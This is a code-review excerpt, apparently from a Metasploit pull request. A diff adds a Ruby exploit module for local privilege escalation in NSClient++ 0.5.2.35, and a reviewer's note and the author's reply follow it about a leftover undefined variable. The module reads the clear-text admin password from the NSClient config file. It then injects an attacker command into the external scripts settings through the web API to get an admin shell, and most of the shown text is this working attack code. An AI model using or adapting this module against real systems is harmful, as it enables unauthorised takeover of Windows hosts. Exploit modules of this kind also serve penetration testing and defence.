modules/exploits/windows/local/nscp_pe.rb

```diff
@@ -0,0 +1,246 @@
+  include ::Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'NSClient++ 0.5.2.35 - Privilege escalation',
+        'Description' => %q{
+          This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.
+          For this module to work, both the NSClient++ web interface  and `ExternalScripts` features must be enabled.
+          You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [               # This module is kind of mix of the two following POCs :
+            'kindredsec', # POC on www.exploit-db.com
+            'BZYO',       # POC on www.exploit-db.com
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '48360'],
+            ['EDB', '46802']
+          ],
+        'Platform' => %w[windows],
+        'Arch' => [ARCH_X64],
+        'Targets' =>
+          [
+            [
+              'Windows',
+              {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :windows_powershell
+              }
+            ]
+          ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-10-20',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+        'DefaultOptions' => { 'SSL' => true, 'RPORT' => 8443 }
+      )
+    )
+
+    deregister_options('RHOSTS')
+    register_options [
+      OptString.new('FILE', [true, 'Config file of NSClient', 'C:\\Program Files\\NSClient++\\nsclient.ini']),
+      OptInt.new('DELAY', [true, 'Delay (in sec.) between each attempt of checking nscp status', 2])
+    ]
+  end
+
+  def rhost
+    session.session_host
+  end
+
+  def configure_payload(token, cmd, key)
+    print_status('Configuring Script with Specified Payload . . .')
+
+    plugin_id = rand(1..10000).to_s
+
+    node = {
+      'path' => '/settings/external scripts/scripts',
+      'key' => key
+    }
+    value = { 'string_data' => cmd }
+    update = { 'node' => node, 'value' => value }
+    payload = [
+      {
+        'plugin_id' => plugin_id,
+        'update' => update
+      }
+    ]
+    json_data = { 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+
+    if !(r&.body.to_s.include? 'STATUS_OK')
+      print_error('Error configuring payload. Hit error at: ' + endpoint)
```

Comment:
```suggestion
      print_error('Error configuring payload.')
```

Ok so `endpoint` hasn't been initialized when I ran this, is it a variable you expected to be imported from a module or did you forget to initialize it?

Reply:
Just something I forgot to remove...